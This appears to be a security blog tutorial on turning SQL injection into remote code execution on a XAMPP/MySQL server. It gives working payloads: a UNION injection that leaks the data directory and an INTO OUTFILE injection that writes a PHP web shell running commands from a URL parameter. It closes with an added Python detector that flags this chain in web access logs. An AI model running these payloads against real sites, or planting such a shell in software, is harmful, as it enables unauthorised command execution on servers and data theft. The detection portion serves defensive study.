How to perform SQLi to RCE?

One of the most interesting and important parts of any site is its database. So it's important to protect it from attacks, and in particular from the most common attack against databases: SQL injection.


This attack is so common because, in most cases, when a programmer sends a query to the database to get a particular answer, part of that query is built from user input. (This is where protection and input validation come in, but we will save that for another time…)

Finding SQLi while investigating a site is cool. But you can agree with me that finding RCE is cooler.

And this is where a methodology that not many try to use comes into play: SQLi to RCE. (Yes, it is possible.)


One of the features of the SQL language is writing to a file, which sounds innocent at first, since almost any programming language can do it. But then comes the interesting part: what if we write a shell file to the system ourselves and use it from the outside? Sounds fun: command execution on the system through a web shell. This depends on permissions, of course: in MySQL, the database account needs the FILE privilege, the secure_file_priv setting must allow the target directory, and the database service must be able to write to it.

Now, let's drill down.

The first thing we do is check where the database is running on the server. This is done by injecting the system variable @@datadir into the SQL query to get the full path of its data directory on the server.


Assuming we found a reflection in the second column, we will enter the following payload:

'union select 1,@@datadir,3,4 --

And the output will look like this:

From the path we can infer that the server uses XAMPP, so if we want to create a file and access it through the web server we need to create it in C:\xampp\htdocs.

According to this information, it’s already possible to create the payload for the shell:

'union select 1,<php_payload>,3,4 into outfile <path> --

'union select 1,'<?php system($_GET["cmd"]); ?>',3,4 into outfile 'C:\\xampp\\htdocs\\rce.php' --

And that's it: we have created a web shell on the system. All that is left is to access it from outside (over the web). This is done from the following link:


In my case it's on the local server, so:

With the following output:

1 The current time is: 16:22:25.20 Enter the new time: 3 4

Upload Webshell from sqli
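
Seen from the defender's side, both steps above leave traces in the web server's access log: the injected `into outfile` request and the later request to the file it wrote. The detector below is an added example, not code from the original article; the log lines are constructed, `item.php` and the `id` parameter are hypothetical, and `PLACEHOLDER` stands in for real content.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines for illustration (Apache-style); item.php and
# the id parameter are hypothetical, PLACEHOLDER stands in for real content.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Jan/2024:16:20:01 +0000] "GET /item.php?id=5 HTTP/1.1" 200 512',
    '127.0.0.1 - - [01/Jan/2024:16:21:10 +0000] "GET /item.php?id=%27union+select+1,@@datadir,3,4+--+ HTTP/1.1" 200 640',
    '127.0.0.1 - - [01/Jan/2024:16:22:02 +0000] "GET /item.php?id=%27union+select+1,%27%3C%3Fphp+PLACEHOLDER+%3F%3E%27,3,4'
    '+into+outfile+%27C:%5C%5Cxampp%5C%5Chtdocs%5C%5Crce.php%27+--+ HTTP/1.1" 200 300',
    '127.0.0.1 - - [01/Jan/2024:16:22:25 +0000] "GET /rce.php?cmd=PLACEHOLDER HTTP/1.1" 200 90',
]

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
UNION = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
FILE_WRITE = re.compile(r"\binto\s+(?:out|dump)file\b(?:\s*['\"]([^'\"]+)['\"])?", re.I)
PHP_TAG = re.compile(r"<\?(?:php|=)", re.I)

def normalize(query):
    """URL-decode, drop inline SQL comments, collapse whitespace."""
    text = re.sub(r"/\*.*?\*/", " ", unquote_plus(query))
    return re.sub(r"\s+", " ", text)

def scan(lines):
    """Return (line_number, finding) pairs for the SQLi-to-file-write chain."""
    findings, dropped = [], set()  # dropped: file names an injection tried to write
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        query = normalize(url.query)
        write = FILE_WRITE.search(query)
        if write:
            kind = "sqli-webshell-write" if PHP_TAG.search(query) else "sqli-file-write"
            findings.append((number, kind))
            if write.group(1):  # remember the target's base name
                dropped.add(re.split(r"[\\/]+", write.group(1))[-1].lower())
        elif url.path.rsplit("/", 1)[-1].lower() in dropped:
            findings.append((number, "request-to-dropped-file"))
        elif UNION.search(query):
            findings.append((number, "sqli-union-probe"))
    return findings

if __name__ == "__main__":
    for number, kind in scan(SAMPLE_LOG):
        print(f"line {number}: {kind}")
```

A `request-to-dropped-file` hit that follows a write finding is the signal to prioritise, because it means the written file is being reached through the web root.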

And now you know how to perform SQLi to RCE!
